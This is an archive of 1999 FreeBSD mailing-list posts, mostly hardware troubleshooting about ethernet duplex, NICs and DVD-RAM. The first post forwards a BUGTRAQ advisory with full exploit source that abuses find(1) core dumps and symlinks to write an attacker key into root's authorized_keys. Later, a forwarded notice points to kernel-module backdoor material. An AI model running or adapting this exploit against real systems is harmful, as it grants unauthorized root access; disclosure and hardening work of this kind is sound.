(forw) FreeBSD (and other BSDs?) local root exploit

1999-08-26 Thread crypt0genic


This was just posted to BUGTRAQ; are the FreeBSD developers aware of this yet?

-Emil

-- 
Reverse engineering, the most fun and usually the most effective way
to tackle a problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/



-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

/*

 (c) 1999 babcia padlina ltd. [EMAIL PROTECTED]

 bug in fts_print function allows to overwrite any file in system, when
 running /etc/security script (executed from 'daily' scripts).

 affected systems:
   - freebsd (all versions)
   - probably openbsd/netbsd

 fix:
   - limit root's coredump size
   - patch libc

*/

#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <strings.h>
#include <string.h>
#include <unistd.h>

/* directory name carrying the key text: the name sits in find(1)'s memory
   when it dumps core, so it is what ends up inside the redirected core file */
#define STRING  "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
/* the file root's core dump is redirected to through the symlink */
#define FILE    "/root/.ssh/authorized_keys"
/* name FreeBSD gives find(1)'s core file (<progname>.core) */
#define CORE    "find.core"
#define DEPTH   300
#define BUFSIZE 250

/* create a world-writable directory, step into it and plant a symlink
   named `linkto` that points at `linkfrom` */
int makedir(const char *dir, const char *linkfrom, const char *linkto)
{
	if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
		return -1;

	if (chdir(dir))
		return -1;

	if (symlink(linkfrom, linkto) < 0)
		return -1;

	return 0;
}

int main(int argc, char **argv)
{
	int i = 0;
	char pid[10], buf[BUFSIZE];

	/* top-level directory named after our pid so repeated runs don't clash */
	sprintf(pid, "%d", getpid());

	if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
	{
		perror("mkdir()");
		return -1;
	}

	if (chdir(pid))
	{
		perror("chdir()");
		return -1;
	}

	/* a 249-byte component of 'A's used as path padding */
	bzero(buf, BUFSIZE);
	memset(buf, 0x41, BUFSIZE-1);

	/* nest DEPTH pairs of directories (key string, then padding), each one
	   holding a find.core -> FILE symlink for the daily /etc/security
	   find(1) run to walk into */
	for (i = 0; i < DEPTH; i++)
	{
		if (makedir(STRING, FILE, CORE) < 0)
		{
			perror("makedir()");
			return -1;
		}

		if (makedir(buf, FILE, CORE) < 0)
		{
			perror("makedir()");
			return -1;
		}
	}

	return 0;
}

- ---
* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43 EA93AFA13BE170BF *

-BEGIN PGP SIGNATURE-
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx
JkgnTo+Dk3QUFGT2bZdmxx9S
=Tyvh
-END PGP SIGNATURE-
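
The posting above chains two things: a privileged process (find(1), run by root from the daily /etc/security script) crashing inside an attacker-owned directory, and its core dump being written through a symlink the attacker planted under the expected core file name. The program below is an added example, not part of the original post and not FreeBSD code; it isolates the second half of that chain. A naive writer opens the dump path the way the exploit relies on (following whatever is there), beside a hardened writer that uses O_CREAT|O_EXCL|O_NOFOLLOW and checks the opened descriptor with fstat before writing. The scratch directory, the "victim" file standing in for /root/.ssh/authorized_keys and the find.core link name are all constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Naive dump writer: open(2) follows a symlink at `path`, so a planted
 * link redirects the write to whatever the link points at, which is
 * exactly what the exploit counts on the kernel's core dumper doing.
 */
static int write_dump_naive(const char *path, const char *data)
{
	int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
	if (fd < 0)
		return -1;
	ssize_t n = write(fd, data, strlen(data));
	close(fd);
	return (n == (ssize_t)strlen(data)) ? 0 : -1;
}

/*
 * Hardened writer: O_CREAT|O_EXCL makes open(2) fail with EEXIST when the
 * name already exists in any form (a dangling symlink included), and
 * O_NOFOLLOW refuses a link in the final path component. fstat on the
 * descriptor then confirms a fresh regular file with one link.
 */
static int write_dump_safe(const char *path, const char *data)
{
	struct stat st;
	int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
	if (fd < 0)
		return -1;
	if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
		close(fd);
		errno = EPERM;
		return -1;
	}
	ssize_t n = write(fd, data, strlen(data));
	close(fd);
	return (n == (ssize_t)strlen(data)) ? 0 : -1;
}

/* read a small file into buf (NUL-terminated); bytes read or -1 */
static ssize_t slurp(const char *path, char *buf, size_t cap)
{
	int fd = open(path, O_RDONLY | O_NOFOLLOW);
	if (fd < 0)
		return -1;
	ssize_t n = read(fd, buf, cap - 1);
	close(fd);
	if (n < 0)
		return -1;
	buf[n] = '\0';
	return n;
}

/*
 * Demonstration (constructed scenario). Plants a "find.core" symlink in a
 * scratch directory pointing at a "victim" file, then runs both writers
 * against the link. Returns a bitmask:
 *   bit 0: the naive writer overwrote the victim through the link
 *   bit 1: the safe writer refused (EEXIST or ELOOP)
 *   bit 2: the victim is unchanged after the safe writer's attempt
 * so 7 means "attack works against the naive writer, blocked by the safe one".
 */
int demo_symlink_clobber(void)
{
	char dir[] = "/tmp/coredemo.XXXXXX";
	char victim[64], link[64], buf[64];
	int result = 0;

	if (mkdtemp(dir) == NULL)
		return -1;
	snprintf(victim, sizeof victim, "%s/victim", dir);
	snprintf(link, sizeof link, "%s/find.core", dir);

	/* victim starts with known, trusted content; attacker plants the link */
	if (write_dump_safe(victim, "trusted\n") < 0 || symlink(victim, link) < 0)
		goto out;

	if (write_dump_naive(link, "ATTACKER\n") == 0 &&
	    slurp(victim, buf, sizeof buf) > 0 && strcmp(buf, "ATTACKER\n") == 0)
		result |= 1;

	if (write_dump_safe(link, "SAFE\n") < 0 && (errno == EEXIST || errno == ELOOP))
		result |= 2;

	if (slurp(victim, buf, sizeof buf) > 0 && strcmp(buf, "ATTACKER\n") == 0)
		result |= 4;

out:
	unlink(link);
	unlink(victim);
	rmdir(dir);
	return result;
}

int main(void)
{
	int r = demo_symlink_clobber();
	printf("naive clobbered victim: %d, safe refused: %d, victim untouched by safe: %d\n",
	       r & 1, (r >> 1) & 1, (r >> 2) & 1);
	return r == 7 ? 0 : 1;
}
```

The workaround the posting suggests, limiting root's core dump size (`ulimit -c 0` in sh, `limit coredumpsize 0` in csh), removes the privileged writer altogether; the hardened open above is the general pattern for any privileged program that has to create files in a directory other users can write to.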





Xircomm ethernet cards....

1999-07-20 Thread crypt0genic

I have a Xircomm 10/100 PCMCIA Ethernet card for my laptop, and after searching
the mailing lists it is pretty obvious that it isn't supported. Does anyone
know of any new developments on this? Hacks?

If not, can someone recommend a good card for FreeBSD? It would have to be
10/100 Mbit and work relatively well with Windows as well as FreeBSD. I could
possibly get my Xircomm replaced.

-Emil

-- 
Reverse engineering, the most phun and usually the most effective way to tackle 
a problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/


To Unsubscribe: send mail to majord...@freebsd.org
with unsubscribe freebsd-hackers in the body of the message



poor ethernet performance?

1999-07-16 Thread crypt0genic
Hey all,

I have two FreeBSD machines, one 3.1-STABLE and the other 3.2-STABLE. I was
ftping a very large file from one machine to another over our LAN; it began to
get extremely slow and began to stall. I suspected too much traffic on our hub
(a Netgear 24-port 10base-T), so I switched the two machines onto an 8-port
Compaq Nettelligent hub. Now there are only these two machines on the hub and
they are still stalling. I tried ftping both ways but it was the same thing.

By looking at the lights on the hub it seems that a burst of data would come
for 2 seconds and then it would be dead for 10. I have 3com 3c905b FastEthernet
cards in both machines, and up until now I have never had these kinds of
problems.

Any Ideas?


-Emil

-- 
Reverse engineering, the most phun and usually the most effective way to tackle 
a problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/





Re: poor ethernet performance?

1999-07-16 Thread crypt0genic
* Andy Doran (a...@fionn.sports.gov.uk) [990716 12:25]:
 What does 'netstat -in' say?

Machine 1 (Tweak)

# netstat -in
Name  Mtu   Network       Address              Ipkts Ierrs    Opkts Oerrs  Coll
xl0   1500  <Link>        00.10.5a.d8.8f.b8    41804     0    73961   174 18255
xl0   1500  10/24         10.0.0.64            41804     0    73961   174 18255
--
Machine 2 (Manson)

$ netstat -in
Name  Mtu   Network       Address              Ipkts Ierrs    Opkts Oerrs  Coll
xl0   1500  <Link>        00.10.4b.b6.1c.ed   130585   171    76642     0 17938
xl0   1500  10            10.0.2.2            130585   171    76642     0 17938
xl0   1500  10            10.0.0.3            130585   171    76642     0 17938
xl0   1500  10            10.0.2.3            130585   171    76642     0 17938

-Emil



-- 
Reverse engineering, the most phun and usually the most effective way to tackle 
a problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/





Re: poor ethernet performance?

1999-07-16 Thread crypt0genic
* Bill Paul (wp...@skynet.ctr.columbia.edu) [990716 13:58]:
  I have two freeBSD machines one 3.1 -STABLE and the other 3.2 -STABLE, 
 
 3.2-STABLE *FROM WHEN*. What date does it say when you run uname -a!

FreeBSD TWEAK.HOME 3.1-STABLE FreeBSD 3.1-STABLE #3: Wed Jun 30 11:00:45 IST 1999 r...@tweak.home:/usr/src/sys/compile/TWEAK  i386

FreeBSD MANSON.HOME 3.2-STABLE FreeBSD 3.2-STABLE #0: Thu Jun 24 20:54:25 IST 1999 r...@manson.home:/usr/src/sys/compile/MANSON  i386

I was unsure when I wrote that in the first place, so I even checked.


 You changed out the hub just because one FTP transfer didn't go as
 fast as you would have liked? Did you reset the interfaces (or reboot
 the machines) when you reconnected them?

I changed the hub because I was planning on doing so for some time anyway, I 
also rebooted the machines.

 
 It sounds a lot to me like you have the duplex modes on the cards set
 wrong, or that the cards are autonegotiating wrong (which is not
 impossible -- some switches that have full duplex ports don't do NWAY
 correctly). The cards must agree with their link partners: if you have
 them plugged into full duplex ports, then they must also be set to full
 duplex. If the cards are plugged into half duplex ports, then they also
 have to be half duplex.
 
 Now you're going to ask me how to set the duplex mode on the interface
 because why read the instructions when you can just ask somebody on
 the web instead, right? Grrr.
 
 # ifconfig xl0 media 10baseT/UTP mediaopt full-duplex
 # ifconfig xl0 media 10baseT/UTP mediaopt half-duplex

That worked, except after a few minutes I got an error on TWEAK reading
"xl0: watchdog timeout". Seeing as you're already reading this, have you any
ideas?

 
 Er. I don't get it. You're implying that the bug fairy just visited
 you one night while you were asleep. This doesn't happen. If you're
 having trouble now and you weren't before, then you changed something. 
 Stands to reason, doesn't it?

Indeed it does. I noticed some slight network performance problems before, but
nothing this severe. Also, fairies only tend to visit me after too much gin,
which I haven't indulged in for quite some time.

Thanks for your help Bill, and also Andy who followed up the thread.

-Emil


-- 
Reverse engineering, the most phun and usually the most effective way to tackle 
a problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/
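
Bill Paul's diagnosis above can be checked against the counters Emil posted earlier in this thread. The following C program is an added example (not from the thread and not FreeBSD's netstat): it parses rows of `netstat -in` output, works out collisions as a percentage of packets sent, and flags an interface as a duplex-mismatch suspect when that rate is high and the interface also logs input or output errors. The two sample rows are constructed from the <Link> lines quoted in the thread; the 10 percent threshold is this example's own assumption, not a figure from the posts.

```c
#include <stdio.h>
#include <string.h>

/* one data row of `netstat -in` */
struct ifcounters {
	char name[16];
	int mtu;
	unsigned long ipkts, ierrs, opkts, oerrs, coll;
};

/*
 * Parse a data row (name, mtu, network, address, then the five counters).
 * Returns 0 on success, -1 if the line does not have that shape, which is
 * how the header line is skipped.
 */
int parse_netstat_row(const char *line, struct ifcounters *c)
{
	char network[32], address[64];
	if (sscanf(line, "%15s %d %31s %63s %lu %lu %lu %lu %lu",
		   c->name, &c->mtu, network, address,
		   &c->ipkts, &c->ierrs, &c->opkts, &c->oerrs, &c->coll) != 9)
		return -1;
	return 0;
}

/* collisions as a percentage of packets sent; 0 when nothing was sent */
double collision_pct(const struct ifcounters *c)
{
	return c->opkts ? 100.0 * (double)c->coll / (double)c->opkts : 0.0;
}

/* collision percentage of one raw row, or -1 if the row is unparseable */
double row_collision_pct(const char *line)
{
	struct ifcounters c;
	if (parse_netstat_row(line, &c) != 0)
		return -1.0;
	return collision_pct(&c);
}

/*
 * Heuristic (this example's assumption): a few percent of collisions is
 * normal on a half-duplex segment, but a collision rate above 10 percent
 * together with input or output errors on a two-host hub points at the
 * duplex mismatch described in the thread.
 */
int duplex_mismatch_suspect(const struct ifcounters *c)
{
	return collision_pct(c) > 10.0 && (c->ierrs + c->oerrs) > 0;
}

/* sample rows, constructed from the figures quoted in the thread */
static const char *sample_rows[] = {
	"Name  Mtu   Network       Address              Ipkts Ierrs    Opkts Oerrs  Coll",
	"xl0   1500  <Link>        00.10.5a.d8.8f.b8    41804     0    73961   174 18255",
	"xl0   1500  <Link>        00.10.4b.b6.1c.ed   130585   171    76642     0 17938",
};

/* number of sample rows that look like a duplex mismatch */
int count_suspect_rows(void)
{
	int n = 0;
	for (size_t i = 0; i < sizeof sample_rows / sizeof sample_rows[0]; i++) {
		struct ifcounters c;
		if (parse_netstat_row(sample_rows[i], &c) == 0 && duplex_mismatch_suspect(&c))
			n++;
	}
	return n;
}

int main(void)
{
	for (size_t i = 0; i < sizeof sample_rows / sizeof sample_rows[0]; i++) {
		struct ifcounters c;
		if (parse_netstat_row(sample_rows[i], &c) != 0)
			continue;
		printf("%s: %.1f%% collisions, %lu in/%lu out errors -> %s\n",
		       c.name, collision_pct(&c), c.ierrs, c.oerrs,
		       duplex_mismatch_suspect(&c) ? "duplex mismatch suspect" : "looks normal");
	}
	return 0;
}
```

Both machines in the thread come out at roughly a quarter of all transmitted packets colliding, with errors on each side, which is the picture Bill describes for cards that disagree with their link partner about duplex mode.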





(forw)

1999-07-12 Thread crypt0genic


Have you all seen this? 

-- 
Reverse engineering, the most phun and usually the most effective way to tackle a 
problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/



Hi folks,

THC released a new article dealing with FreeBSD 3.x
Kernel modules that can attack/backdoor the
system.
You can find our article on http://thc.pimmel.com or
http://r3wt.base.org.

Greets, pragmatic / The Hacker's Choice





Re: DVD-ram

1999-07-01 Thread crypt0genic

* Dag-Erling Smorgrav ([EMAIL PROTECTED]) [990701 11:47]:
 
 LaCie don't make drives, they just package them in ugly boxes with
 noisy fans.

I'm not sure what model you are referring to, but the drive I have is in a
stylish external box with a fan that doesn't make a whisper of noise. It also
doesn't make any sound when reading/writing. The unit is so sturdy I reckon I
could throw it at a brick wall without damaging it! Overall I'm very pleased
with this piece of hardware, and when it is supported under FreeBSD it will be
one of my most prized devices. : )

-crypt0genic
 

-- 
Reverse engineering, the most phun and usually the most effective way to tackle a 
problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/





Re: DVD-ram

1999-07-01 Thread crypt0genic
* Kenneth D. Merry (k...@plutotech.com) [990701 07:56]:

 No, it's SCSI, I'm using an Adaptec adapter. Keep in mind that I am unfamiliar
 with SCSI devices so I might already be doing/have done something stupid ; )
  
 
 It's not SCSI.  The acd driver is the ATAPI CD driver.  If you had a SCSI
 DVD drive, it would show up as 'cd0'.

Sorry, the actual dmesg for the device is 

cd0 at ahc0 bus 0 target 6 lun 0
cd0: MATSHITA PD-2 LF-D100 A110 Removable CD-ROM SCSI-2 device
cd0: 10.000MB/s transfers (10.000MHz, offset 15)
cd0: cd present [1218960 x 2048 byte records]

I apologise for the confusion.

-crypt0genic



-- 
Reverse engineering, the most phun and usually the most effective way to tackle 
a problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/


To Unsubscribe: send mail to majord...@freebsd.org
with unsubscribe freebsd-hackers in the body of the message




Re: DVD-ram

1999-06-30 Thread crypt0genic

I have a LaCie DVD-RAM drive; it works great under Windows. Here is the dmesg I
get from it, I hope this is of some help.

acd0: drive speed 1033KB/sec, 256KB cache
acd0: supported read types:
acd0: Audio: play, 255 volume levels
acd0: Mechanism: ejectable tray
acd0: Medium: no/blank disc inside, unlocked

AFAIK I need to format the disks I'm using, but I'm unsure what format to use.
If anyone has some suggestions or would like me to try different things for
information purposes I will be glad to help out.

Also, on another note, what is the support like for a Creative Labs Encore DVD
drive under FreeBSD?

-crypt0genic


* David Miller ([EMAIL PROTECTED]) [990630 09:53]:
 Apologies if this should be on -scsi
 
 Has anyone done any work with dvd-ram drives under FreeBSD?
 
 I will soon need to duplicate dvd-ram media and would very much like to do
 it under unix.  All I need to start with is the ability to read/write the
 raw device.
 
 Currently the drive is recognized as cd0 (FreeBSD 3.2) and I can read a
 2.x GB side but not, of course, write it.  I'm looking at cdrecord for
 clues but would like not to reinvent someone elses work.
 
 Thanks in advance,
 
 --- David
 
 
 
 

-- 
Reverse engineering, the most phun and usually the most effective way to tackle a 
problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/





Re: DVD-ram

1999-06-30 Thread crypt0genic

* David Miller ([EMAIL PROTECTED]) [990630 22:58]:
 On Wed, 30 Jun 1999, crypt0genic wrote:
 
 IDE interface I take it?  This is the normal message for a CD.

No, it's SCSI, I'm using an Adaptec adapter. Keep in mind that I am unfamiliar
with SCSI devices so I might already be doing/have done something stupid ; )

-crypt0genic
 
 
 I didn't realize it until we used it under 95/98, but the DVD-ram appears
 to act like an MO drive.  IE, one can add, remove, change files at will.
 I may hack the od driver in the next couple of days to see if it will work
 at all.
 

-- 
Reverse engineering, the most phun and usually the most effective way to tackle a 
problem or learn something new.
Public PGP key: http://www.ecad.org/crypt0genic_pgp_key
Website:http://www.ecad.org/




